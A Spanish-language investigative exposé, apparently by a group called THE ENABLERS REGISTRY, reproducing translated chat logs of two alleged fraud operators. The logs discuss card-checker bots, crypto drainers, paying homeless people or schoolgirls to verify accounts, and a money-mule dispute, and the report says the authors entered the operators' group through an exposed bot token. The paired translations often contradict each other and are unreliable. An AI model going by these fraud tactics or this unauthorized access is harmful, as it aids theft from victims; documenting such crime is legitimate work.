Lo último que hizo el ayuntamiento fue piratear 2d.Lo último que se veía en 2D era genial
B
Bonya2026-03-12 17:01
Si me buscas por mi cuenta o por el presupuesto, verás que las escaladas en 2D requieren entre 1 y 2 mil zeles para pruebas, y eso no durará mucho.Si lo buscas, ya sea con mis propios recursos o con el presupuesto, para dar con algo que funcione en 2D hay que gastarse entre 1 y 2 mil en pruebas, y aun así no durará mucho.
B
Bonya2026-03-12 17:00
Estoy sirviendoEstoy echando
B
Bonya2026-03-12 16:59
(ya que no existen tales requisitos para las ofertas de personas blancas)Porque no hay requisitos de ese tipo para las ofertas blancas)
B
Bonya2026-02-14 14:33
¿Quién tiene un «dreiner» en la prueba AML? Solo con DEP o «ready» en el avalista.¿Alguien tiene un drenador para la prueba AML? ¿Solo con depósito o ya preparados para el garante?
B
Bonya2026-01-11 03:14
Hay alguien en el grupo de Facebook y hay un compañero. Necesito que Facebook reponga el stock; el precio es negociable.Hay quien ha jugado en Facebook y hay apuestas. Hay que recargar la cuenta de Facebook; el precio lo acordamos.
-- SТYХ СНAT [ STYXMARKET.ST ] (2 mensajes) --
B
Bonya2025-12-05 12:04
Necesito facturas, Payzaty, Cashfree, Eportal 3DSNecesito facturas, Payzaty, Cashfree, Eportal 3DS
B
Bonya2025-11-22 11:14
¿Hay alguien que se encargue de moderar el chat?¿Hay alguien que se encargue del chat?
-- Chat sobre arbitraje de tráfico (2 mensajes) --
B
Bonya2025-11-24 14:50
100%100%
B
Bonya2025-11-24 14:49
El canal Tg será secuestradoMe van a robar el canal de [REDACTED]
-- Raven CC checker (2 mensajes) --
B
Bonya2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
Bonya2025-11-21 21:18
/check/check
-- Chat de Vision Browser (2 mensajes) --
B
Bonya2025-11-14 16:47
Gracias.Gracias
B
Bonya2025-11-14 16:47
¿Vicen trabaja en Ru?¿El trabajo de Vishen en Rusia?
-- 💬ONE|Chat (86 mensajes) --
B
Bonya2025-03-05 17:06
Chicos, decidme alguna tienda donde pueda comprar almohadillas.Chicos, decidme dónde se pueden conseguir las pistas.
B
Bonya2025-03-05 16:22
ni siquiera puedo hacer una manicuraNi siquiera es capaz de hacerte una manicura
B
Bonya2025-03-05 16:22
del mismo modotambién
B
Bonya2025-03-05 16:21
Joder, dime de una vez si el tutor tiene un chat con los alumnos o no.Joder, ¿alguien me puede decir si el tutor tiene un chat con los alumnos o no?
B
Bonya2025-03-05 16:10
¿Y de quién es?¿Y quién es el autor del hilo?
B
Bonya2025-03-05 15:44
No es difícil, pero aquí no hay manuales completos, solo tutoriales.Allí no es difícil, pero aquí no hay manuales completos, solo los de los instructores.
B
Bonya2025-03-05 15:42
En principio, sí, si sabes cómo hacerlo.En realidad, sí, si sabes cómo
B
Bonya2025-03-05 15:42
medio díamedio día
B
Bonya2025-03-05 15:42
El primero tiene 600 personas, pero no responde.No responde a las primeras 600 personas
B
Bonya2025-03-05 15:41
Si tienes dinero, cómprate el que cuesta 200 dólares.Si tienes dinero, coge a la que pide 200 dólares.
B
Bonya2025-03-05 13:55
¿Quién es tan genial que sabe que hay una sala de chat para estudiantes?¿Quién se encarga de la formación en Fantástica? ¿Hay algún chat para los alumnos?
B
Bonya2025-03-03 15:10
ChequesRecibos
B
Bonya2025-03-03 15:10
El que pasa la aspiradoraLa que pasa la aspiradora
B
Bonya2025-03-03 15:10
EntendidoHay
B
Bonya2025-03-03 15:10
Seguramente habrá putas que se dediquen al software.Pero aquí seguro que hay alguna chapuza con el software
B
Bonya2025-03-03 15:09
FueFue
B
Bonya2025-03-03 15:09
Ah, qué bien.Vaya, esto sí que mola
B
Bonya2025-03-03 15:09
Trinuriuet ruruTrinuriuet ruru
B
Bonya2025-03-03 15:09
Y se están recogiendoY los recogen
B
Bonya2025-03-03 15:09
Tip está ahí sentado, jodiendo con los envoltoriosEl tío está sentado comiéndose unas patatas fritas.
B
Bonya2025-03-03 15:04
¿Por qué hay matrículas ucranianas?¿Y para qué los números en ucraniano?
B
Bonya2025-03-03 15:03
Dije «kc».Dije «kts»
B
Bonya2025-03-03 15:03
Ya lo tengo.Lo he entendido
B
Bonya2025-03-03 15:03
Si es complicado, te vas a perder el bombín.Si te lo pones aquí, se te va a caer el gorro.
B
Bonya2025-03-03 15:03
Joder, comparemos cuántas veces vas a reproducir el vídeo de Facebook mientras yo retiro el roux.Joder, vamos, compara a ver cuántas veces vas a poner el «Me gusta» en Facebook mientras yo grabo el vídeo.
B
Bonya2025-03-03 15:02
Para una acompañanteServicio de acompañantes
B
Bonya2025-03-03 15:02
Esos tipos tienen una forma de hablar tan cutre que te dan ganas de mandarlos a la mierda.A estos tipos les encanta montar un lío de cojones
B
Bonya2025-03-03 15:02
Joder, aquí solo hay «wokers».Joder, aquí solo hay trabajadores de la mano de obra
B
Bonya2025-03-03 15:02
¿Qué tipo de mesas?¿Qué mesas?
B
Bonya2025-03-03 15:01
Te llevarás 30 si tienes una voz bonita.30 serán tuyos si tu voz es bonita
B
Bonya2025-03-03 15:01
Hay más dineroAllí hay más dinero
B
Bonya2025-03-03 15:01
Ven a trabajar a mi empresa.Ven al centro cultural a trabajar conmigo
B
Bonya2025-03-03 15:00
NoNo
B
Bonya2025-03-03 14:59
PlategamPlategam
B
Bonya2025-03-03 14:59
+ No sé cómo funciona una repetición+ No tengo ni idea de lo que se dice por ahí
B
Bonya2025-03-03 14:59
Es difícil encontrar buenas ofertas.También es difícil encontrar buenos drops
B
Bonya2025-03-03 14:58
¿O hay una versión 1.0?O bien, la versión 1.0 está disponible
B
Bonya2025-03-03 14:58
Aquí solo hay 2,0 phish.Y aquí los fusibles para una intensidad de 2,0
B
Bonya2025-03-03 14:58
O mejor 1,0 que 2,0.Bueno, o mejor un 1,0 que un 2,0
B
Bonya2025-03-03 14:57
Con los mamutsCon los mamuts
B
Bonya2025-03-03 14:57
La versión 2.0 no funciona si te pasas el día sin hacer nada.2.0: no vale la pena quedarse ahí parloteando
B
Bonya2025-03-03 14:57
Yo soy más bien de tráfico.Ya no soy el que más tráfico tiene
B
Bonya2025-03-03 14:57
Aquí están las «X» de RooAquí están las «x» en la mano
B
Bonya2025-03-03 14:56
Pero no se trata de eslóganes publicitariosPero no se trata de equipos de publicidad
B
Bonya2025-03-03 14:56
Sí, lo hacen. Conozco a alguien que lo hace.(Lo hacen) Tengo conocidos que lo hacen
B
Bonya2025-03-03 14:56
No es así si sabes cómo ganar entre 400 y 500 al día.Vaya, si sabes cómo, hay gente que gana entre 400 y 500 al día.
B
Bonya2025-03-03 14:55
¿Y qué tiene de especial?)Bueno, ¿y qué es lo que se me ha olvidado aquí?)
B
Bonya2025-03-03 14:55
Hay un enlace al manualAhí hay un enlace al manual.
B
Bonya2025-03-03 14:54
Este es el tipo de manosCon manos así, seguro que se meten en líos
B
Bonya2025-03-03 14:54
Babeando y mirando con lascivia para que me den una puta mano.Joder, para poner en marcha el motor, te puedes hacer la boca agua y abrir los ojos como platos.
B
Bonya2025-03-03 14:54
Bueno, ¿y cuál es el problema? Es lo mismo.Bueno, ¿y cuál es el problema? Es lo mismo de siempre.
B
Bonya2025-03-03 14:53
Tardaremos un mes en llegar a la zona.Llegarán a la zona en un mes
B
Bonya2025-03-03 14:53
Y no hay ningún sitio adonde ir. Si tienes dos dedos de frente, ya te darás cuenta. Si no, te vas de aquí.Y es que aquí no hay nada que hacer: si tienes cabeza, te darás cuenta de que no hay nada que hacer.
B
Bonya2025-03-03 14:53
¿Qué quieres?¿Qué querías?
B
Bonya2025-03-03 14:53
AnuncioPublicidad
B
Bonya2025-03-03 14:52
Llevo aquí dos días y la versión 2.0 no me parece interesante. A mí me parecía genial.Llevo aquí dos días y la versión 2.0 no me interesa; pensaba que sería algo divertido.
B
Bonya2025-03-03 14:52
Y que te vaya de maravillaY tener un mamut
B
Bonya2025-03-03 14:52
Piensa bien qué vas a decir.Tengo que pensar un poco en qué responder.
B
Bonya2025-03-03 14:52
No hay secretosAquí no hay secretos
B
Bonya2025-03-03 14:52
¿Qué te va a dar?¿Qué os va a aportar?
B
Bonya2025-03-03 14:52
Bueno, ¿qué sentido tiene si el manual contiene exactamente la misma información?Pero, ¿qué sentido tiene si en el manual está toda esa información?
B
Bonya2025-03-03 14:51
Tendrá tiempo para responder a todos vuestros capullosJoder, ¿cómo vamos a dar abasto para responderos a todos?
B
Bonya2025-03-03 14:51
Menudo entrenamiento.¿Qué práctica?
B
Bonya2025-03-03 14:51
Hay 100 personas ahí dentro.Vaya, tiene por allí a 100 personas
B
Bonya2025-03-03 14:51
¿Por qué no me das un poco de dinero y yo te doy el manual de la abrazadera?¿Me podéis pasar un poco de pasta? A cambio os daré el manual de la fijación.
B
Bonya2025-03-03 14:50
Al fijarEn la fijación
B
Bonya2025-03-03 14:50
No necesitas un manual que te lo explique todo.¿Y qué os importa la formación? Ya tenéis el manual.
B
Bonya2025-03-03 14:50
La versión 2.0 es lo que es.2.0 Lo que era, eso es lo que es
B
Bonya2025-03-03 14:50
¿Qué coño pasa?Vaya, menuda tarea más jodida.
B
Bonya2025-03-03 14:48
¿Lo has iniciado tú mismo?¿Ya te has puesto a ello?
B
Bonya2025-03-03 14:48
No estoy locoNo funciona para nada
B
Bonya2025-03-03 14:48
Hay un acceso al lkEn el lado izquierdo hay un golpe mortal
B
Bonya2025-03-03 14:48
¿Qué pasa con el lk?¿Qué tipo de trabajo en LC?
B
Bonya2025-03-03 14:48
¿Cuál de estos sois vosotros, capullos, como vosotros mismos decís?¿De quién coño son estas, si me permites la expresión?
B
Bonya2025-03-03 14:47
No entiendo lo que quieres decir con esto.Aquí no he entendido lo que has dicho.
B
Bonya2025-03-03 14:46
Si han iniciado sesión, estupendo.Si entran en el LC, entonces ZBS
B
Bonya2025-03-03 14:46
Bueno, ¿se conectan?¿Entráis en el LC?
B
Bonya2025-03-03 14:45
No sé cómo los graban.No tengo ni idea de cómo se graban.
B
Bonya2025-03-03 14:45
¿Perros que hay que dar por perdidos?¿Te apuntas a la suscripción?
B
Bonya2025-03-03 14:45
Joder, hay un puto botónY encima todavía hay que andarse con rodeos
B
Bonya2025-03-03 14:42
Me lo estoy sirviendo yo mismoLo echo yo mismo
B
Bonya2025-03-03 14:42
Joder, me he dado cuenta de que no es para los capullos.Joder, lo entendería si no fuera una gilipollez
B
Bonya2025-03-03 14:41
Tío, aquí no venden nada con fichas, es una ficha de día de paga.Tío, aquí no venden nada con fichas; aquí las fichas son para pagar.
B
Bonya2025-03-03 14:41
Ya lo pillo, no hay ningún sitio donde echarloYa lo he entendido, aquí no hay ningún sitio donde echarlo.
B
Bonya2025-03-03 14:40
Regular 2.0, creo.Los típicos 2.0, más o menos
B
Bonya2025-03-03 14:40
No es que estén saturando el tráficoPues aquí no generan tráfico de inmediato
-- FbStor - ¡El chat de los webmasters de éxito! (23 mensajes) --
B
Bonya2025-02-26 07:51
Bueno, haz lo que te dé la gana, joder.Bueno, pues haz lo que te dé la gana allí
B
Bonya2025-02-26 07:50
Un escolar: 200₽.Bueno, a la colegiala le daré 200₽
B
Bonya2025-02-26 07:50
FuncionaráServirá
B
Bonya2025-02-26 07:50
Te encontrarás con un vagabundo en la calle.En la calle, atrapa a un vagabundo y pásalo
B
Bonya2025-02-26 07:50
Así que todo el mundo cree en su propio rostro, sea de quien sea.Así que todos se verifican con su foto, a quién le importa
B
Bonya2025-02-26 07:50
En la cara.A su propio riesgo
B
Bonya2025-02-26 07:49
Pero la verdad es que, da igual, ya lo he hecho diez veces.Pero, la verdad, qué más da, tengo unas 10 cuentas verificadas.
B
Bonya2025-02-26 07:49
A ver, dime, solo estás diciendo tonterías.Entonces, dime, ¿estás difundiendo rumores maliciosos?
B
Bonya2025-02-26 07:49
Puedes¿Se puede?
B
Bonya2025-02-26 07:49
En la cara.A su propio riesgo
B
Bonya2025-02-16 20:26
en lugar de joderlos con algún tipo de entrenamiento y hacerles correr entre el tráfico.¿Y no es más bien para engañarles con algún tipo de formación y sacarles tráfico?
B
Bonya2025-02-16 20:25
lo normal, UBT, TT, TT, YouTube, etc.los vídeos normales de UBT, TT, YouTube, etc.
B
Bonya2025-02-15 17:31
XzNo sé
B
Bonya2025-02-15 17:31
Con el pretexto de la formaciónCon el pretexto de la formación
B
Bonya2025-02-15 17:31
Hacia los canalesEn los canales
B
Bonya2025-02-15 17:31
Es solo el tráfico de gente.Es que el tráfico de gente da mucho que hacer
B
Bonya2025-02-15 17:31
Pues el tipo dice que te suscribas a todos sus canalesPues ese tipo dice que hay que suscribirse a todos sus canales
B
Bonya2025-02-15 16:36
No hace falta que escribasHuiñú sugiere que no escribáis
B
Bonya2025-02-06 15:11
Si no sabes lo básico sobre cómo servir, vas a...Si no conoces conceptos básicos como cómo verter, ¿cómo vas a...?
B
Bonya2025-02-06 15:11
Hay un botón para cambiar el aipi; al menos deberías buscarlo en Google.Al pulsar ese botón cambia la IP; si quieres, búscalo en Google.
B
Bonya2025-02-06 15:10
🤨🤨
B
Bonya2025-02-06 15:09
Puedes cambiar el aipi que hay ahí girándolo.Allí se puede cambiar la rotación del AIP.
B
Bonya2025-02-06 15:09
¿Por qué el 1? Es el mismo móvil.¿Por qué el 1? Si son móviles...
-- CryptoGrab - CHAT de ayuda mutua (10 mensajes) --
B
Bonya2025-02-06 15:31
No es tan sencilloNo es tan sencillo
B
Bonya2025-02-06 15:31
Fácil.Izi
B
Bonya2025-01-23 20:30
Ni un solo ejemploNo es el único ejemplo
B
Bonya2025-01-23 20:30
No me hace ninguna gracia que no haya podido encontrar ningún anuncio de pruebas de LMA en Internet.¿No te parece curioso que no haya encontrado ni un solo anuncio de las pruebas AML en Internet?
B
Bonya2025-01-23 17:20
No hay absolutamente nada en el AML.En AML no hay nada en absoluto
B
Bonya2025-01-23 17:20
Probé AML en Facebook para ver si también funcionaba en Estados Unidos; incluso con paquetes antiguos que no se encuentran en Internet.He intentado buscar «AML» en Facebook para ver si encontraba algo sobre Estados Unidos, pero tampoco he encontrado nada interesante, ni siquiera enlaces antiguos, en Internet.
B
Bonya2025-01-23 17:19
Bueno, ¿qué tipo de oferta tienes pensado hacer?Bueno, en general, ¿qué oferta tienes pensado hacer?
B
Bonya2025-01-23 17:16
¿Utilizas AML?¿Y tú juegas al AML?
B
Bonya2025-01-21 20:38
A cualquiera que publique en Facebook le gustaría aclarar un par de cuestiones¿Hay alguien que se dedique a la fundición de hierro fundido? Me gustaría aclarar un par de cosas.
B
Bonya2025-01-20 11:08
¿Alguien tiene algún ejemplo de creos para AML?¿Alguien tiene ejemplos de «creo» para AML?
-- Rolex | chat general (28 mensajes) --
B
Bonya2024-09-11 15:29
¿Qué están haciendo los lituanos en qué pista?¿Y a Lituania le están dando una paliza en qué campo?
B
Bonya2024-09-11 15:21
¿Estás jodiendo con el tornillo?¿Pero qué coño estás haciendo?
B
Bonya2024-09-11 15:20
Es solo que las páginas son muy restrictivas y hay que perder mucho tiempo con ellasEs que las plataformas limitan mucho el trabajo y son un rollo con ellas.
B
Bonya2024-09-11 15:19
Tengo una idea en mente. Si lo hacen, va a ser jodidamente genial.Se me ha ocurrido una idea y la he escrito ahí; si la llevan a cabo, va a ser la hostia.
B
Bonya2024-09-11 15:19
No veo muchos troncos por la finca.La verdad es que no veo muchos logotipos de la Finka
B
Bonya2024-09-11 15:19
Se está montando un lío de cojones con todas las salas.Venga ya, esos tíos tienen algún lío con todas las pistas
B
Bonya2024-09-11 15:16
Eso es lo que digo, es como un vado sobre otro vado.Bueno, ya te digo que es un timo tras otro.
B
Bonya2024-09-11 15:15
No entiendo qué es lo que está mejorando ahora; veo que en Finlandia nadie está trabajando.No entiendo para nada qué es lo que funciona mejor ahora mismo; veo que a todo el mundo le falla algo en la aplicación.
B
Bonya2024-09-11 15:08
Bueno, tienes un 50 % de posibilidades de tener suerte con los proxies.Bueno, 50/50, si hay suerte con los proxies.
B
Bonya2024-09-11 15:07
Pero para que lo entiendas, hoy en día, con los proxies de lujo, incluso en Viber, cuando inicias sesión, se vuelve loco.Pero para que lo entiendas: ahora, con los proxies de lujo, incluso en Viber, cuando entras, te da error.
B
Bonya2024-09-11 15:07
Bueno, no sé nada sobre las latas de la UE.Bueno, no tengo ni idea de cómo funcionan los bancos europeos.
B
Bonya2024-09-11 15:07
En lkEn el perfil
B
Bonya2024-09-11 15:06
Antes, las tiendas de delicatessen solían tener diez cámaras frigoríficas.Antes, los lacas de 10 capas aguantaban mejor
B
Bonya2024-09-11 15:06
Bueno, el 922 también está a 1 pulgada y se mantiene ahí.Bueno, el 922 también entra en el 1 y se queda ahí.
B
Bonya2024-09-11 15:05
Incluso «privat» después de tres visitas les pone los pelos de punta.Incluso en privado, después de tres intentos, los estafa.
B
Bonya2024-09-11 15:05
Si hay un apoderado, de 1 a 2 bancosSi hay 1 proxy, 1-2 bancos de corriente
B
Bonya2024-09-11 15:05
Bueno, depende del bancoBueno, depende del banco
B
Bonya2024-09-11 15:04
Los representantes suelen ser unos asquerosos en toda esa tontería del laksheriEn Laksheri, los proxies suelen estar sucios
B
Bonya2024-09-11 08:44
¿Está dormido?¿Y él está durmiendo?
B
Bonya2024-09-11 08:40
Vaya, qué buena idea.Se me ha ocurrido lo del ZBS
B
Bonya2024-09-11 08:40
¿No hay por allí algún mercadillo o algo así?¿Y por qué no tienen por ahí mercadillos de todo tipo?
B
Bonya2024-09-11 08:40
Menuda cagadaHuevo
B
Bonya2024-09-11 08:39
BilyaBilya
B
Bonya2024-09-11 08:39
¿Hay salas de chat?¿Hay chats por allí?
B
Bonya2024-09-11 08:38
¿Alguien sabe¿Alguien sabe?
B
Bonya2024-09-11 08:38
¿La gente de la finca usa TG?¿Se usa [REDACTED] en Finca?
B
Bonya2024-09-10 12:14
Gracias.Gracias
B
Bonya2024-09-10 12:13
¿Qué hora es en Finlandia?Echa un vistazo ahora mismo a la Finka
-- Actualidad/verificaciones/ingresos💃🛍 (37 mensajes) --
B
Bonya2024-06-16 17:17
No veo a nadie que la defienda con vehemenciaNo veo aquí a nadie que la defienda a capa y espada
B
Bonya2024-06-16 17:17
Bueno, se ha explicado toda la situación y ahora cada uno toma su propia decisión, y el hecho de que solo el administrador Pasha la defienda dice mucho.Bueno, ya he explicado la situación; ahora cada uno decide por sí mismo, y el hecho de que solo el administrador Paşa la defienda dice mucho.
B
Bonya2024-06-16 17:15
Y tampoco volvió a pagarY, una vez más, no ha pagado.
B
Bonya2024-06-16 17:15
No, ella nos lo transfirió a nosotros, y como no teníamos la cuenta principal para transferir el dinero, le escribimos a Vika como último recurso.No, ella nos lo pasó a nosotros, pero nosotros no teníamos el método de pago principal para transferir el dinero, así que le escribimos a Vika como último recurso.
B
Bonya2024-06-16 17:14
Al principio nosotros también estábamos bien, pero últimamente tu dinero no deja de desaparecer.Al principio todo iba bien por nuestra parte también, pero últimamente se os pierde el dinero constantemente.
B
Bonya2024-06-16 17:14
¿Estoy haciendo spam? Solo estoy aquí contando la verdad. Puedes borrarlo. Que la gente sepa cómo trabajas.¿Y yo qué tengo que ver con el spam? Me paso el día contando la verdad a la gente; puedes borrarlo, ¿qué va a cambiar? Que la gente sepa cómo trabajáis.
B
Bonya2024-06-16 17:13
Cuando tengas uno de estosCuando te pase algo así
B
Bonya2024-06-16 17:13
Así que es hora de que reflexionesAsí que es hora de que os lo penséis
B
Bonya2024-06-16 17:13
Nosotros también llevamos mucho tiempo trabajando con nei y esta es la segunda vez que se da esta situaciónLlevamos mucho tiempo trabajando con ella y esta ya es la segunda vez que pasa esto.
B
Bonya2024-06-16 17:13
Y grabó los «gs» y dijo: «Ya sabes cómo funciona».Y ella tomó nota del gs y dijo que ya sabías cómo funciona.
B
Bonya2024-06-16 17:13
Eso es exactamente lo que pasó. Empecemos por el principio: le cogimos la tarjeta para ingresar dinero, metimos 60k, ella fue a sacarlo y nos escribió diciendo que el dinero no estaría allí porque el cajero se había quedado con la tarjeta, y ya está, acabamos de tirar 60k a la basura.Exacto, eso es lo que pasó. Vamos a empezar por el principio: le pedimos su tarjeta para ingresarle 60k; ella fue a sacarlos y nos dijo que no habría dinero, que, al parecer, el cajero automático se había quedado con la tarjeta y ya está. Así que, en resumen, nos habíamos quedado sin los 60k.
B
Bonya2024-06-16 17:11
No es ella quien nos tiene¿Y no somos nosotros los que estamos con ella?
B
Bonya2024-06-16 17:11
Aunque nos robaron 60 000Aunque nos han robado 60 mil
B
Bonya2024-06-16 17:11
¿Normal? Ya lo hemos explicado todo aquí. Estás diciendo que somos unos idiotas.¿Normales? Ya lo hemos explicado todo aquí, y vosotros decís que somos unos idiotas.
B
Bonya2024-06-16 17:10
La estás defendiendo¿La estás defendiendo?
B
Bonya2024-06-16 17:10
Todavía tiene nuestro dineroSe quedó con nuestro dinero
B
Bonya2024-06-16 17:10
Todos ellosTodo
B
Bonya2024-06-16 17:10
Que a un hombre le dieron 60 mil, pero ella dijo que no tenía dinero.A ese hombre le dieron 60 mil y él dijo que no habría dinero.
B
Bonya2024-06-16 17:10
Descrito*Describieron*
B
Bonya2024-06-16 17:10
Ya se te ha explicado toda la situaciónTe han explicado toda la situación
B
Bonya2024-06-16 17:09
¿Quién es la que se pasa de la raya? ¿Ella o nosotros?¿Quién es la tonta, ella o nosotros?
B
Bonya2024-06-16 17:09
Tenemos 60 mil en el banco. ¿Dónde está el dinero?Han ingresado 60 mil, ¿dónde está el dinero?
B
Bonya2024-06-16 17:09
Ya te han explicado toda la situación, da igual cuál sea tu sexo.¿Qué mujeres te han explicado toda la situación? El sexo no importa en absoluto.
B
Bonya2024-06-16 17:08
Saca 60 mil y déjalo ahí.Ganar 60 mil y dejarlo estar
B
Bonya2024-06-16 17:08
O que te jodan, dentro de lo razonable.¿O qué coño tenéis dentro de lo razonable?
B
Bonya2024-06-16 17:08
La gente no tiene con qué pagar¿De dónde sacan el dinero para pagar?
B
Bonya2024-06-16 17:08
Y dice que la tarjeta se ha estropeado y que se ha quedado sin dinero.Y dice que la tarjeta se ha atascado y que no hay dinero.
B
Bonya2024-06-16 17:08
A un hombre le dieron 60 mil, y ella se fue a rodar.A una mujer le dieron 60 mil y se fue a alquilar un piso.
B
Bonya2024-06-16 17:07
Así que me vas a contar los hechos.Pues explícalo con argumentos
B
Bonya2024-06-16 17:07
Entonces, ¿a quién coño hay que culpar? ¿Quién es el que la ha cagado, si no soy yo?Entonces, ¿quién coño tiene la culpa? ¿Quién es el gilipollas, yo?
B
Bonya2024-06-16 17:07
¿No tienes nada que decir?¿No hay nada que decir?
B
Bonya2024-06-16 17:07
O es que no podía teclear el puto código PIN.O que, joder, con esas manos torcidas ni siquiera he podido marcar el número
B
Bonya2024-06-16 17:06
¿Cómo coño puede un cajero automático atascarse con la tarjeta?¿Cómo coño se le ha podido tragar la tarjeta al cajero automático?
B
Bonya2024-06-16 17:06
ChupetesSuciones
B
Bonya2024-06-16 17:06
Y tú te estás corriendo por ella, joder.¿Y vosotros qué coño hacéis aquí descargando cosas por ella?
B
Bonya2024-06-16 17:06
Jodidos «naturales», sois unos putos idiotas. Tenéis a una puto mujer aquí sentada liándose con su dinero y el cajero le ha tragado la tarjeta.Joder, sois unos jodidos idiotas, tenéis una mierda en la cabeza, ¿qué coño pasa que el cajero le ha tragado la tarjeta?
B
Bonya2024-06-16 16:40
@kysia1987, no funciona, es una estafa; le di una patada voladora y se fusionó con 60k@kysia1987 No funciona, es una estafa; me dio una pequeña ganancia y luego se esfumó con 60k.

MONETTI ESCOBAR: El jefe silencioso

En marcado contraste con los 261 mensajes de Bonya, MONETTI solo tiene 10 mensajes públicos — todo en un único hilo en Chat de TraFFeeQ (Arbitraje de tráfico negro de ADS/SEO), en defensa de un compañero:

Chat de TraFFeeQDiciembre de 2025
«Un hombre hace su trabajo y le pagan por ello. ¿Te parece bien?»
Una persona hace su trabajo, le pagan por ello, ¿qué más hay que discutir?
Normalizar las actividades delictivas como «simplemente un trabajo»
Chat de TraFFeeQDiciembre de 2025
«No hay nada que discutir contigo»
No hay nada que discutir contigo.
Autoridad despectiva: mentalidad de jefe, por encima de cualquier debate
Chat de TraFFeeQDiciembre de 2025
«¡Hay muchas cosas que hacer aparte de ti!»
Sin ti hay cosas que hacer)
Implica múltiples operaciones simultáneas que requieren su atención

Los grupos de [REDACTED] de MONETTI lo dicen todo: Medusa Google Ads (fraude de PPC de «black hat»), un Canal de deepfakes (medios sintéticos utilizados con fines fraudulentos), y CHAT DE MARLBORO (privado, desconocido). La suscripción a [REDACTED] Premium, horario comercial 24 horas al día, 7 días a la semana, y «Есть предложение» («Tengo una propuesta») Su trayectoria profesional nos permite hacernos una idea de alguien que se dedica a la ciberdelincuencia a tiempo completo.

MONETTI ESCOBAR: Registro completo de mensajes (10 mensajes)
MONETTI ESCOBAR (@monettiescobar) — Historial completo de mensajes traducidos
-- TraFFeeQ Chat | Arbitraje de tráfico | Black ADS/SEO | (9 mensajes) --
ME
MONETTI ESCOBAR2025-12-06 20:42
¡Déjalo!¡Déjalo!
ME
MONETTI ESCOBAR2025-12-06 20:42
Un hombre hace su trabajoEl hombre se dedica a su trabajo.
ME
MONETTI ESCOBAR2025-12-06 20:42
Sin agresividadNingún tipo de agresión
ME
MONETTI ESCOBAR2025-12-06 20:40
Tampoco te preocupes por esoNo te preocupes por eso tampoco.
ME
MONETTI ESCOBAR2025-12-06 20:39
Habla con él, tío. No tiene prohibido hacerlo.Habla con él, tío, a él no le han prohibido hacerlo.
ME
MONETTI ESCOBAR2025-12-06 20:39
¡Hay muchas cosas que hacer además de ti!)¡Hay otras cosas en las que entretenerse aparte de ti!)
ME
MONETTI ESCOBAR2025-12-06 20:39
No hay nada que discutir contigoNo hay nada que discutir contigo.
ME
MONETTI ESCOBAR2025-12-06 20:38
Está escrito junto a su apodo. No hace falta que lo selecciones, lo verás.Junto a su nombre de usuario pone: «No le des en la cabeza», así que léelo.
ME
MONETTI ESCOBAR2025-12-06 20:38
El hombre hace su trabajo, le pagan por ello (me gustaría hablar de ello)Cada uno hace su trabajo, cobra por ello; si te gusta, coméntalo.
-- Medusa | Google Ads | Chat (1 mensaje) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
Perfil de MONETTI ESCOBAR en [REDACTED]
Captura de pantalla 2 — Perfil de MONETTI en [REDACTED].
Perfil de Bonya en [REDACTED]
Captura de pantalla 3 — Perfil de Bonya. Fíjate en DC2 (Ámsterdam).

Sección 7: La habitación del pánico

Después de que THE ENABLERS REGISTRY accediera al grupo de operadores a través del bot de [REDACTED] que había quedado expuesto, tuvo lugar el siguiente intercambio. El registro de la conversación que figura a continuación se ha traducido al inglés, conservando el ruso original en cursiva. Se ha ocultado la identidad utilizada para acceder.

Grupo de operadores — «Tarjeta Idr» — Historial completo del chat (61 mensajes)
— REDACTED se unió mediante un token de bot expuesto —
R
OMITIDO25-03-2026 13:03:43
/start
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
¿Quién?¿Quién?
B
Bonya25-03-2026 13:07:14
XzNo sé
R
OMITIDO25-03-2026 13:07:14
Hola, solo tienes que guardar tus datos y esperar un minuto.
ME
MONETTI ESCOBAR25-03-2026 13:07:24
¿Pero qué coño...?¿Qué coño...?
B
Bonya25-03-2026 13:07:27
JoderJoder
B
Bonya25-03-2026 13:07:28
Ese es quien¿Quién es quién?
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Ajá.Jajaja
ME
MONETTI ESCOBAR25-03-2026 13:07:44
¿Pero qué coño?¿Qué coño...?
B
Bonya25-03-2026 13:07:53
El bot ha sido pirateadoHan hackeado el bot
B
Bonya25-03-2026 13:08:16
Me han dicho que nuestra defensa es una mierda.Por cierto, me han dicho que nuestra defensa es una pasada.
B
Bonya25-03-2026 13:08:22
Bueno, hay un tipoBueno, hay uno de esos, ya sabes
B
Bonya25-03-2026 13:08:43
Es como colar un bot a través de un ataque de possibly phishing.Con nuestro bot, romper la pesca es pan comido
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[OMITIDO].[OMITIDO]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
¿Quién es ese?¿Quién es ese?
B
Bonya25-03-2026 13:10:29
Comprueba tu perfil.Echa un vistazo a tu perfil
B
Bonya25-03-2026 13:10:32
Es un hackerEs un hacker
B
Bonya25-03-2026 13:10:35
Literalmente.En sentido estricto
B
Bonya25-03-2026 13:10:41
He traducido lo que está canalizandoHan traducido lo que escribe en el canal
B
Bonya25-03-2026 13:10:55
[OMITIDO — Bonya copia y pega el mensaje del canal que denunció su dominio, intentando identificar quién les ha denunciado]
B
Bonya25-03-2026 13:12:19
Bueno, eh...Bueno, en fin...
B
Bonya25-03-2026 13:12:23
No tengo ni puta idea de quién es ese.Ni puta idea de quién es ese
B
Bonya25-03-2026 13:12:25
Pero no para siemprePero no es nada bueno
B
Bonya25-03-2026 13:12:47
@devosus, pensemos en la defensa antes de que nos den una paliza.@devosus, piensa en la defensa antes de que nos den una paliza.
Nota del editor: Bonya lo ve venir. Supongamos que es ruso y que considera que estafar a Ucrania es un acto «patriótico». Entonces, ¿qué hay de Indonesia —un Socio del BRICS desde octubre de 2024 (¿La cumbre de Kazán?) ¿Es también patriótico robar a los ciudadanos de tus aliados? Los estafadores de la CEI son ladrones que no hacen distinciones, carecen por completo de inteligencia y no tienen ninguna lealtad. Lee nuestras otras investigaciones en las que hemos documentado casos de enjuiciamiento En el caso de operadores similares, el final siempre es el mismo.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Sí, ya lo veo.Sí, lo veo
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Que te jodan.¿Pero qué tonterías estás diciendo?
B
Bonya25-03-2026 13:13:09
